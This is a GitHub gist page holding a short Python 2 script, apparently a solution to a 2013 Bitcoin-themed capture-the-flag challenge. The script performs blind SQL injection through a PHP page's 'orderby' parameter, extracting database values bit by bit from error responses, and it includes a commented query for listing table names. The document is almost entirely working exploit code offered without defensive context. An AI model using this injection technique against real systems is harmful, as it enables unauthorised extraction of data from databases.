Instantly share code, notes, and snippets.

anonymous /bitcoinctf_exploit2.py Secret
Created May 4, 2013

Embed
What would you like to do?
import requests
import string
import sys
url = "http://www.bitcoinctf.com/"
page = "b00km4rks.php?orderby=(%s)&limit=1"
# Table names
# query = "(select(table_name)from(information_schema.tables)where((ord(substring(table_name,1,1))>90)and(substring(table_name,%s,1)='%s'))union(select(1)))"
# Bookmarks
query = "(select(addedby)from(urls)where((deleted=2)and(ord(substring(addedby,%s,1))%s26%s=%s))union(select(1)))"
for i in range(1, 38):
value = 0
for c in range(8):
exp = 2**c
response = requests.get(url + page % (query % (i, '%', exp, exp)))
if response.text[:7] == "Unknown":
value += exp
if value == 0:
print "END"
break
print chr(value)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment